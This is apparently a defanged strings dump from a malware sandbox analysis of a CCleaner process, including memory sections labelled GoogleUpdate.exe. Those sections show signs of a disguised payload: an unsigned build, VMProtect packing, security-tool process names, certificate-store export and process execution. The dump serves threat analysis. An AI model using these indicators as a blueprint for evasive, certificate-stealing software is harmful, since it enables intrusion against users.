hXXp://VVV.piriform.com/go/app_cc_privacy_policy?a=%s&v=%s&l=%s
Error loading branding.dll %s- 0x%x: %s
Extra error loading branding.dll %s- 0x%x: %s
branding.dll
mv1.00.001
mv%d.d.d
?a=%s&v=%s&l=%s
TRIAL VERSION (%d days remaining)
mhXXp://VVV.piriform.com/go/app_cc_home_title
mhXXp://VVV.piriform.com/go/app_cc_home_pear
mPackages\windows_ie_ac_001\AC\Microsoft\Internet Explorer\DOMStore
/export
uninst.exe
Uninstall.lnk
3.18.1708
CCInfo.txt
CCVERSION=%s
CCEDITION=%s
CCREGISTERED=%s
OS=%s
CPU=%s
RAM=%s
GPU=%s
m%m/%d/%Y %I:%M:%S %p
%s|%s|%s|%s
Guxtheme.dll
%s (%s %d%%)
%s (%s)
JHKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
GAdvapi32.dll
R_WINDOWS_SERVICES
N_INT_PASSWORD
N_MOZ_PASSWORD
N_THUNDERBIRD_PASSWORD
N_OPERA_CACHE
N_OPERA_HISTORY
N_OPERA_COOKIES
N_OPERA_WEBSITE_ICONS
N_OPERA_PASSWORD
N_OPERA_LAST_DOWNLOAD_LOCATION
N_OPERA_RECENTLY_TYPED_URLS
N_OPERA_SESSION
N_OPERA_HISTORY_15
N_OPERA_COOKIES_15
N_OPERA_DOWNLOAD
N_OPERA_FORM
N_OPERA_COMPACT_DATABASES
N_SAFARI_PASSWORD
N_CHROME_CACHE
N_CHROME_COOKIES
N_CHROME_HISTORY
N_CHROME_DOWNLOAD
N_CHROME_FORM
N_CHROME_PASSWORD
N_CHROME_SESSION
N_CHROME_COMPACT_DATABASES
N_CHROME_FLASH_COOKIES
N_CHROME_LAST_DOWNLOAD_LOCATION
N_EX_NETWORK_PASSWORDS
N_EX_WINDOWS_EVENT_LOGS
N_EX_PREVIOUS_WINDOWS_INSTALLATION
comctl32.dll
/|%'" ><:\
G%s%s
Kernel32.dll
%d Files
oSP%d
SOFTWARE\Microsoft\Windows NT\CurrentVersion
Windows 95
Windows 98
Windows ME
Windows NT
Windows 2000
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows Server 2008 R2
Windows 7
Windows 8
Windows 8.1
Windows Server 2012
Windows Server 2012 R2
Windows 10
Windows
%sGB RAM
%sMB RAM
Web Server
_kernel32.dll
\DosDevices\%s
F%s%s%s
J%%%d
Portugu
s (Portuguese)
s do Brasil (Brazilian Portuguese)
lang-*.dll
_.dll
JShowOperaCleanWarning
UpdateKey
\StringFileInfo\xx\%s
Fv%d.d.d
wininet.dll
Unknown error = %d
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
%CommonProgramFiles%
%CommonProgramFiles(x86)%
*%systemdirectory%*
%systemdirectory%
%SystemDirectory32%
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
{A520A1A4-1780-4FF6-BD18-167343C5AF16}
%s_Classes
Microsoft\Windows
FSoftware\Microsoft\Windows\CurrentVersion\Run
g%s%s%s%s
%s|%s
%s|%s%s%s%s%s
%s\%s\%s
G%s.ini
Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU
Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU
%s\%s
Recently Typed URLs
JPRAGMA %s;
SELECT id, name, value, host, path, expiry, isSecure, isHttpOnly FROM moz_cookies;
webappsstore2
SELECT scope FROM webappsstore2;
webappsstore
SELECT domain FROM webappsstore;
SELECT h.id FROM moz_places h
SELECT b.id FROM moz_bookmarks b
SELECT a.id FROM moz_annos a
select clientID,Key,Generation,DataSize from moz_cache;
thunderbird.exe
firefox.exe
mozilla.exe
seamonkey.exe
palemoon.exe
songbird.exe
k-meleon.exe
icedragon.exe
cyberfox.exe
compatibility.ini
application.ini
profiles.ini
user_pref("%s", %s);
%d));

GoogleUpdate.exe_2512:




.text
`.data
.idata
@.gfids
@.rsrc
@.reloc
B.vmp0
operator
operator ""
%S#[k
GoogleUpdate_unsigned.pdb
.CRT$XCA
.CRT$XCAA
.CRT$XCL
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.text$di
.text$mn
.text$yd
.xdata$x
.data
.idata$5
.idata$2
.idata$3
.idata$4
.idata$6
.gfids$x
.gfids$y
.rsrc$01
.rsrc$02
.hxY@
RegOpenKeyExW
ADVAPI32.dll
GetProcessHeap
KERNEL32.dll
SHELL32.dll
USER32.dll
SHLWAPI.dll
GetCPInfo
<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">
</asmv3:windowsSettings>
<requestedExecutionLevel level="asInvoker" />
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
###7777_{
###____777
###````87{
0 0$0004080
?&?2?@?}?
2 2$2(2,2|9
0	0D0
.reloc
.edata
.xyCS5F
w..BI"[
O@e3F.AYW%
MES.uX
r.GOf{
ha.SS|`6
@!.TZ]8
GpP*.tJ!U&,
0c~Ngx]o;l|v1Sd3.EU)px_X ZW_@
5cÊ
\%sfx<
x;.DF&
.kQxlR-uslf&N|=7
rF.clIJ1
CRTDLL.DLL
7$80858{9
5!5/555~5
4-494?4\4|4
kkqvx_.dll
@.data
.pdata
@.idata
T.WM9
%D,3G
.VK <
3%*"!2 2
.NSmm
L:\LADy6t=6\
cM5`CMd}GIf
X&jO>hcopo2%D,kEENFH|k
*:K.GT=`A
: '#75~8
(727 =5)
MAXB^q.eTLnzrlrA(mm: .*_
/uAKncxhy>.sm
cmDWAgyb}kq cKf-FEgSJm~bXkv|L
11,U~5.cd{BBOPQ&IRJho~r8pOL`)_FAMHu(U[se~ws4 -
].syce$|Ibn
YFA%UGvhlmr
5.kk2
dUnmcz5.Tc)LZRMSta][.
#.UbhOCC
v"#R|e&P[|i^OMvR$*rIf_qwq.yz
=(<:-71(
//#.9~!/#
%%u'SzJ
Òp(#e?[bgI
OlPI87.eqGGgb
].%-%8xm
kkqvx_64.dll
.vmp0
sfc_os.dll
32RegSetKeySecurity
00RegOpenKeyExA
02RegCreateKeyExA
04RegCloseKey
31RegEnumKeyExA
advapi32.dll
$%s%s\
%s%s\
22EnumDesktopWindows
buser32.dll
2.exe
sfc.dll
Osfc.dll
|MSASCui.exe|msseces.exe|Tcpview.exe|
crtdll.dll
Qrsvp.exe
chrome.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
47PeekNamedPipe
09WinExec
48CreatePipe
pstorec.dll
$%s_%u
%s\%s
ole32.dll
 oleaut32.dll
CertFreeCertificateContext
CryptFindCertificateKeyProvInfo
(CertOpenSystemStoreA
bCertEnumCertificatesInStore
CertAddCertificateContextToStore
RCertGetNameStringA
CertOpenStore
CertCloseStore
PFXExportCertStore
crypt32.dll
shell32.dll
mscoree.dll
ext-ms-win-ntuser-windowstation-l1-1-0
kernel32.dll
GoogleUpdate.exe
goopdate.dll
Software\Google\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}
%Program Files%\Google\Update\GoogleUpdate.exe
1.3.31.5
2007-2010
2007-2010

%original file name%.exe_3308_rwx_006EB000_00006000:




CleanPasswords - SQLite error:
CleanPasswordsExceptions - SQLite error:
SrClient.dll
<Task xmlns="hXXp://schemas.microsoft.com/windows/2004/02/mit/task">
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Exec>
</Exec>
moz_deleted_logins
DELETE FROM moz_logins
%localappdata%\Google\Chrome\Application\chrome.exe
%ProgramFiles%\Google\Chrome\Application\chrome.exe
%localappdata%\Flock\Application\flock.exe
%ProgramFiles%\Flock\Application\flock.exe
%localappdata%\Google\Chrome SxS\Application\chrome.exe
%ProgramFiles%\Google\Chrome SxS\Application\chrome.exe
%localappdata%\SRWare Iron\iron.exe
%ProgramFiles%\SRWare Iron\iron.exe
%ProgramFiles%\Chromium\chrome.exe
%localappdata%\Chromium\chrome.exe
%ProgramFiles%\Chromium\Application\chrome.exe
%localappdata%\Chromium\Application\chrome.exe
%AppData%\ChromePlus\chrome.exe
%localappdata%\RockMelt\Application\rockmelt.exe
%ProgramFiles%\RockMelt\Application\rockmelt.exe
%LocalAppData%\Comodo\Dragon\dragon.exe
%ProgramFiles%\Comodo\Dragon\dragon.exe
%LocalAppData%\MapleStudio\ChromePlus\Application\Chrome.exe
%AppData%\MapleStudio\ChromePlus\Application\Chrome.exe
%ProgramFiles%\baidu\Spark\chrome.exe
%localappdata%\Torch\Application\torch.exe
%localappdata%\Yandex\YandexBrowser\Application\browser.exe
chrome.exe
flock.exe
iron.exe
rockmelt.exe
dragon.exe
spark.exe
torch.exe
browser.exe
operaprefs.ini
\cookies4.dat
\pstorage\psindex.dat
\application_cache\cache_groups.xml
opera.exe
Google Chrome - Cookies
Opera - Cookies
Mozilla - Cookies
.Pepper Data
index.dat
#HttpOnly_
DOMStore:hXXp://
DOMStore:hXXps://
ID=%d
PR=%d
DA=%s
RK=%s
RU=%d
CK=%d
SK=%s
VK=%s
VA=%s
CR=%d
PF=%d
EI=%d
FL=%d
IIT=%d
FI=%d
SI=%d
JPSAPI.DLL
\regedit.exe
regedit.exe
%d/%d/%d %d:%d:%d %s
iexplore.exe
safari.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
.Startup
.CommonStartup
Software\Microsoft\Windows\CurrentVersion\Uninstall
%s%s%s%s%s
{%s-%s-%s-%s-%s}
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
WindowsInstaller
ParentKeyName
msiexec.exe /X%s
msiexec.exe
/fpecms %s
rundll32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\
msiexec
*.ico
*setup.exe
*msiexec.exe
*.dll
*.exe
imageres.dll
"%s" %s
msiexec.exe %s%s/X%s
G%m/%d/%Y %I:%M:%S %p
Kernel32.DLL
Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved
mscoree.dll
Software\Microsoft\Windows\CurrentVersion\Ext\Settings
{1FBA04EE-3024-11d2-8F1F-0000F87ABD16}
{E0DD6CAB-2D10-11D2-8F1A-0000F87ABD16}
*.lnk
Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder
hkey
%Commonprogramfiles%
*\%s\*
%s|%s|%s
|%s|%s|%s
Windows Shutdown
Windows Boot
Cancelled Operation
J%s-%d
%d - %s
%s %s
CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\Shell
CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\Shell\
Gntuser.dat
rE]*desktop.ini
desktop.ini
JWebpageIcons.db
com.apple.Safari.plist
*\Shockwave Flash\*\#SharedObjects\*\macromedia.com\support\flashplayer\sys\settings.sol
settings.sol
Shockwave Flash\macromedia.com\support\flashplayer\sys\
\macromedia.com\support\flashplayer\sys\
//NoLogo "%s"
cscript.exe
history.dat
places.sqlite
urlbarhistory.sqlite
prefs.js
*.png
*\k-meleon*prefs.js
user_pref("kmeleon.MRU.URL
downloads.rdf
downloads.sqlite
cookies.txt
cookies.sqlite
webappsstore.sqlite
*.sqlite
\indexedDB
permissions.sqlite
index.sqlite
*index.sqlite
*\indexedDB\*.sqlite
*\OfflineCache\index.sqlite
*\permissions.sqlite
formhistory.dat
formhistory.sqlite
signons.txt
signons2.txt
signons3.txt
signons.sqlite
logins.json
signon.SignonFileName
\prefs.js
sessionstore.js
sessionstore.bak
session.json
user_pref("kmeleon.plugins.sessions2
searchhistory.xml
content-prefs.sqlite
*-journal;*.tmp
global.dat
global_history.dat
search_field_history.dat
opera.dir
download.dat
vlink4.dat
autosave.win
autosave.win.bak
session.db
session.dbak
opera6.ini
opera.exe*
typed_history.xml
wand.dat
Login Data
*.idx
cookies4.dat
*.dat
cache_groups.xml
psindex.dat

%original file name%.exe_3308_rwx_006F2000_00005000:




{9E175BB4-F52A-11D8-B9A5-505054503030}
{30c3f6cd-98b5-11cf-bb82-00aa00bdce0b}
%localappdata%\Google\Chrome\User Data\Default\Cache
%localappdata%\Google\Chrome\User Data\Default\Media Cache
%localappdata%\Google\Chrome\User Data\Default\GPUCache
*\JumpListIcons*\*.tmp
\Origin Bound Certs
*.localstorage
*.indexeddb
\IndexedDB
host_key
Databases.db
Origin Bound Certs
*databases\http_*_0*
*databases\https_*_0*
\Web Data
History Index*.*
*.tmp
Web Data
\Login Data
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Thumbnail Cache
databases\Databases.db
keychain.plist
Apple Computer\Safari\Bookmarks.plist
\cookies.plist
\Cookies.binarycookies
\StorageTracker.db
\ApplicationCache.db
manifestURL
ApplicationCache.db
StorageTracker.db
cookies.plist
Cookies.binarycookies
HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
%SystemDrive%
\Windows.old*
\$WINDOWS.~BT
\$WINDOWS.~Q
\\?\%s
Microsoft\Windows\WebCache
WebCacheV01.dat
WebCacheV24.dat
iexplore.exe*
G.bmp
.jpeg
.wave
.midi
.html
%s\UserChoice
%s\OpenWithProgids
%s\OpenWithList
{e8cc4cbe-fdff-11d0-b865-00a0c9081c1d}
msmsgs.exe
{D2B7A809-15DC-40B4-A1E1-C61EA97191DB}
%s - %s
HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store
HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted
Software\Microsoft\Windows\CurrentVersion\Uninstall\
mozillaplugins
windows
%s\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules
CLSID\%s
Software\Classes\CLSID\%s
{00020424-0000-0000-C000-000000000046}
%systemroot%
%systemroot%\system32
ImagePath - %s
select * from meta where key='last_compatible_version';
select host_key, creatio

%original file name%.exe_3308_rwx_006F8000_0000B000:




hXXp://
ZwQueryKey
7b81be6a-ce2b-4676-a29e-eb907a5126c5
1.3.6.1.4.1.311.2.1.12
WindowsCreateString
WindowsDeleteString
1953261156
1836216166
URLString
ux
profile.name
google.services.username
app.launch.web_url
extensions.settings.
extensions.known_disabled
extensions.settings
X:X:X:X:X:X
041ULKGbv7meLDmSgUyrkw==
: this object doesn't support resynchronization
StreamTransformation: this object doesn't support random access
RandomNumberStore: CopyRangeTo2() is not supported by this store
%s-%s-%s-%s-%s
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
: this object does't support a special last block
: this object doesn't support multiple channels
is not a valid key length
operation failed with error
WerReportAddDump
WerReportCloseHandle
WerReportCreate
WerReportSubmit
page_url
delete from icon_mapping where id = %s
delete from thumbnails where url_id not in (Select id from icon_mapping)
downloads_url_chains
delete from %s
delete from ie7_logins
delete from logins
\Google\Chrome\User Data
\Google\Chrome SxS\User Data
\MapleStudio\ChromePlus\User Data
\ChromePlus\ChromePlusUserData
G\Opera
Opera*
\Opera\Opera\profile
\Opera\Opera7\profile
\Opera\Opera75\profile
\Opera\Opera 8 Beta\profile
\Opera\Opera 9 Beta\profile
\Opera\Opera 9\profile
\Opera\Opera 10 Beta
\Opera\Opera
\Opera\Opera 10
\Opera Software\Opera Stable
\Opera Software\Opera Next
\Opera Software\Opera Developer
\Opera\profile
\Opera 9\profile
%Program Files%\Opera\profile
%Program Files%\Opera 9\profile
lhXXp://
hXXps://
DET_OPERA
DET_MOZILLA
DET_MOZILLA_GOOGLE_TOOLBAR
DET_SAFARI_PASSWORD
%ProgramFiles%\Safari\Safari.exe
DET_CHROME
Packages\windows_ie_ac_001\AC\Microsoft\Internet Explorer\DOMStore
Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Extensible Cache
Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache
%s.%s
C:\Windows\Cookies
\Cookies.plist
Windows Registry Editor Version 5.00
[%s%s%s]
x,
\Mozilla\Firefox
\Mozilla
\Mozilla\SeaMonkey
\profiles.ini
\Profiles\profiles.ini
https
\cookies.txt
\cookies.sqlite
\webappsstore.sqlite
select scope from webappsstore2;
select domain from webappsstore;
*cookies.sqlite
*webappsstore.sqlite
delete from %s where %s not in (
delete from %s;
%s\indexedDB
http   
https   
delete from moz_cache where Key like 'http%//
delete from moz_hosts where id=%d and type='offline-app' and permission=1;
4llX-%X
DelegateExecute
Gopera6.adr
bookmarks.adr
persistent.txt
icons\persistent.txt
*.ini
Gcombase.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon
%s\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon
advapi32.dll
SOFTWARE\Apple Inc.\Apple Application Support
plUtil.exe
-convert xml1 "%s" -o "%s"
-convert binary1 "%s" -o "%s"
select url, iconID from PageURL;
delete from IconData where iconID not in (%s);
delete from IconInfo where iconID not in (%s);
delete from PageURL where iconID not in (%s);
delete from PageURL;
UPDATE sqlite_sequence SET seq=0;
%s\LocalStorage
%s\LocalStorage\StorageTracker.db
delete from Origins where origin = "%s";
%s\Databases\Databases.db
delete from Origins where origin in (select origin from databases where guid not in ("%s"));
delete from Databases where guid not in ("%s");
delete from sqlite_sequence where name = 'Databases';
%s\ApplicationCache.db
select manifestURL, id from CacheGroups;
delete from CacheAllowsAllNetworkRequests where cache in (select id from caches where cacheGroup not in ("%s"));
delete from CacheEntries where cache in (select id from caches where cacheGroup not in ("%s"));
delete from CacheGroups where id not in ("%s");
delete from CacheResourceData where id in (Select resource from CacheEntries where cache in (select id from caches where cacheGroup not in ("%s")));
delete from CacheResources where id in (Select resource from CacheEntries where cache in (select id from caches where cacheGroup not in ("%s")));
delete from CacheWhitelistURLs where cache in (select id from caches where cacheGroup not in ("%s"));
delete from FallbackURLs where cache in (select id from caches where cacheGroup not in ("%s"));
delete from caches where cacheGroup not in ("%s");
delete from CacheWhitelistURLs;
delete from FallbackURLs;
1%s_%d
SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDlls
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\
Software\Microsoft\Windows NT\CurrentVersion\Fonts
Software\Microsoft\Windows\CurrentVersion\App Paths
Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted
Software\Microsoft\Windows\Help
Software\Microsoft\Windows\HTML Help
Software\Microsoft\Windows\CurrentVersion\Installer\Folders
Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache
SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs
Software\Microsoft\Windows\ShellNoRoam\MUICache
Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Software\Classes\%s
%s%s%d
SOFTWARE\Classes%s%s
Jselect url from favorites;
select url from snapshots;
select url from sites;
macromedia.com
*\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\*\macromedia.com*
g%s|%s|%s|%s|%s
G*extensions.json
addons[id=%s]
Update addon Set active = %d, userDisabled = %d Where id = '%s'
extensions.pendingOperations
Select location from addon Where id = '%s'
addons.json
addons.sqlite
Select creator From addon where id = '%s'
extensions.json
extensions.sqlite
Select addon.id, locale.name, locale.description, addon.active, addon.userDisabled, addon.appDisabled, locale.creator, addon.type, addon.defaultLocale, addon.descriptor, addon.location, addon.version, addon.pendingUninstall, addon.installDate, addon.updateDate
From addon Inner Join locale On addon.defaultLocale = locale.id
Where addon.type = 'extension'
Update addon Set pendingUninstall = 1 Where id = '%s'
plugin.state.
\pluginreg.dat
chrome-extension_%s_0
.localstorage
Dplugins.plugins_list
G"url":
G%s.%d
G%d.%d
SELECT %s FROM %s
WHERE %s
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
%s\Connection
%s_%s=
gWinInet.dll
hXXps://*
hXXps://VVV.piriform.com/go/app_cc_get_update?v=%s&l=%s&o=%s
%s?v=%s&l=%s&o=%s
&a=%s
&t=%s
%s.exe
H%c%c%c%c
P0x%x: %s
update.ini
hXXps://license.piriform.com/update/?p=%s&c=%s&cv=%s&l=%s&o=%s&lk=%s&mk=%s
%s?a=%s&v=%s&l=%s
%s/INSTDIR='%s' /L=%s
/COMMANDLINE='%s'
%s?p=%s&v=%s&l=%s&o=%s
&lk=%s
&mk=%s
Error updating CCleaner %s- 0x%x: %s
Extra error updating CCleaner %s- 0x%x: %s
Mozilla/4.0
%d.%d%s%d
hXXp://crash-reports.piriform.com/submit
Send Report
Report sent successfully.
Error sending report: too many reports.
Error sending report.
GPiriform::Breakpad::CKeyboardHook::Message::B4E8893A-C6C1-4c98-BFFC-B81923F8C77D
Pwer.dll
tCCleaner Consent Key
CCleaner.exe
CCleaner crash report
NTDLL.DLL
KERNEL32.DLL
dbghelp.dll
rpcrt4.dll
%s\%s.dmp
%d minutes remaining
%sXX
x-x-x-xx-xxxxxx
Disassembler->Instruction.Address == Address
Disassembler->Instruction.Length < MAX_INSTRUCTION_LENGTH

%original file name%.exe_3308_rwx_00705000_00003000:




%s:[%s]
0xX=
]=0xX
[0xI64X] ANOMALY: Unexpected operand size prefix
%s 0xX:[
%s %s:[
[0xI64X] ERROR: mod != 3 for AMODE_PR ("%s")
[0xI64X] ERROR: invalid mmx register %d for AMODE_PR ("%s")
[0xI64X] ERROR: AMODE_PR illegal in 16-bit mode ("%s")
[0xI64X] ERROR: mod != 3 for AMODE_VR ("%s")
[0xI64X] ERROR: AMODE_VR illegal in 16-bit mode ("%s")
[0xI64X] ERROR: invalid mmx register %d for AMODE_P ("%s")
[0xI64X] ERROR: AMODE_P illegal in 16-bit mode ("%s")
[0xI64X] ERROR: mod != 3 for AMODE_R ("%s")
seg_X
[0xI64X] ERROR: mod = 3 for AMODE_M ("%s")
[0xI64X] ERROR: mod = 3 for AMODE_E with OPTYPE_p ("%s")
>Flags & (OP_EXEC|OP_SRC|OP_DST)
>OperandIndex < 2
OperandIndex == 1
Operand->Length == 1
X86Instruction->OperandSize >= Operand->Length
(Operand->Flags & OP_EXEC) && (Instruction->Groups & ITYPE_EXEC)
(Operand)->TargetAddress
(Operand)->Length <= 8
(Operand)->Flags & OP_FAR
[!((Operand)->Flags & OP_FAR)
X86_Registers[Operand->Register]
Operand->Length
*.jpg
*.raw
*.gif
*.jpeg
*.bmp
*.tif
*.tiff
*.psd
*.mp3
*.wma
*.ogg
*.wav
*.aac
*.flac
*.aif
*.aiff
*.aifc
*.aifr
*.midi
*.mid
*.rmi
*.mp2
*.doc
*.xls
*.ppt
*.odt
*.ods
*.pdf
*.docx
*.xlsx
*.pptx
*.odc
*.pps
*.avi
*.mov
*.mpg
*.mp4
*.flv
*.wmv
*.mpeg
*.mpe
*.mpv
*.ifv
*.zip
*.zipx
*.rar
*.ace
*.arj
*.cab
*.tar
*.eml
*.pst
*.ost
Gntdll.dll
\\.\%s
\\?\%s%s%s
\\.\Scsi%d:
ATA/ATAPI-%d
ATA-%d
---- [Xh]
fmifs.dll
*$Recycle.Bin*

%original file name%.exe_3308_rwx_0070B000_00070000:




D:\v5.00A\bin\CCleaner\Release\CCleaner.pdb

GoogleUpdate.exe_3580:




.text
`.data
.idata
@.gfids
@.rsrc
@.reloc
B.vmp0
operator
operator ""
%S#[k
GoogleUpdate_unsigned.pdb
.CRT$XCA
.CRT$XCAA
.CRT$XCL
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.text$di
.text$mn
.text$yd
.xdata$x
.data
.idata$5
.idata$2
.idata$3
.idata$4
.idata$6
.gfids$x
.gfids$y
.rsrc$01
.rsrc$02
.hxY@
RegOpenKeyExW
ADVAPI32.dll
GetProcessHeap
KERNEL32.dll
SHELL32.dll
USER32.dll
SHLWAPI.dll
GetCPInfo
<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">
</asmv3:windowsSettings>
<requestedExecutionLevel level="asInvoker" />
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
###7777_{
###____777
###````87{
0 0$0004080
?&?2?@?}?
2 2$2(2,2|9
0	0D0
.reloc
.edata
.xyCS5F
w..BI"[
O@e3F.AYW%
MES.uX
r.GOf{
ha.SS|`6
@!.TZ]8
GpP*.tJ!U&,
0c~Ngx]o;l|v1Sd3.EU)px_X ZW_@
5cÊ
\%sfx<
x;.DF&
.kQxlR-uslf&N|=7
rF.clIJ1
CRTDLL.DLL
7$80858{9
5!5/555~5
4-494?4\4|4
kkqvx_.dll
..qL\\K)6
..hX\\
..DX\\
..xX\\
(.sX\\
(.kX\\
..xX\\KK
..sL\\KP
..xL\\
..xL\\K
..xL\\KQ>
..nY\\Kj
..jL\\
*7.sX\\
..sX\\
..pL\\K
..pL\\Kd
..mL\\KO
..gX\\K
]\ .cX\\
\\*&3_\\
..lH\\
]\*&_]_\
]\*&'^\\
]\*&_]\\
(&{]\\*  
.dWQ•<y;e
.a5>.xjV("H
kCK~un9i.SC{0
GyCA9:!x.UZig]XIN^
_SS%C
6??/*UDp{
:% %9/';
@SU}GU.emm{FCm2
JmAqJL.RaZ^AmieyMR
TvkF`.mc~nV}I
fOWU.hgHJzap[
_j_^a~y6.wNcLVF][c
T@@_`xy7.vNpNF@ZP\
}%dThyY[B,
.AiwNx
g{w~#p.Xtq
f0 c.Jn<VYYO
.vmp0
sfc_os.dll
32RegSetKeySecurity
00RegOpenKeyExA
02RegCreateKeyExA
04RegCloseKey
31RegEnumKeyExA
advapi32.dll
22EnumDesktopWindows
buser32.dll
sfc.dll
Osfc.dll
crtdll.dll
47PeekNamedPipe
09WinExec
48CreatePipe
pstorec.dll
$%s_%u
ole32.dll
 oleaut32.dll
CertFreeCertificateContext
CryptFindCertificateKeyProvInfo
(CertOpenSystemStoreA
bCertEnumCertificatesInStore
CertAddCertificateContextToStore
RCertGetNameStringA
CertOpenStore
CertCloseStore
PFXExportCertStore
crypt32.dll
shell32.dll
mscoree.dll
ext-ms-win-ntuser-windowstation-l1-1-0
kernel32.dll
GoogleUpdate.exe
goopdate.dll
Software\Google\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}
%Program Files%\Google\Update\GoogleUpdate.exe
1.3.31.5
2007-2010
2007-2010

%original file name%.exe_3308_rwx_0077F000_0000A000:




.?AVwindows_file_codecvt@@
zcÁ
.?AUIOperation@Piriform@@
.?AV?$IOperationImpl@UIOperation@Piriform@@@Piriform@@
.?AV?$bind_t@XV?$mf1@XV?$IActivationEvents2AsyncImpl@VCActivationEvents2Marshaller@Piriform@@UIActivationEvents2@2@@Piriform@@ABV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@_mfi@boost@@V?$list2@V?$value@PAV?$IActivationEvents2AsyncImpl@VCActivationEvents2Marshaller@Piriform@@UIActivationEvents2@2@@Piriform@@@_bi@boost@@V?$value@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@23@@_bi@3@@_bi@boost@@
Assertion failed: %s, file %s, line %d

%original file name%.exe_3308_rwx_007A9000_00006000:




SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
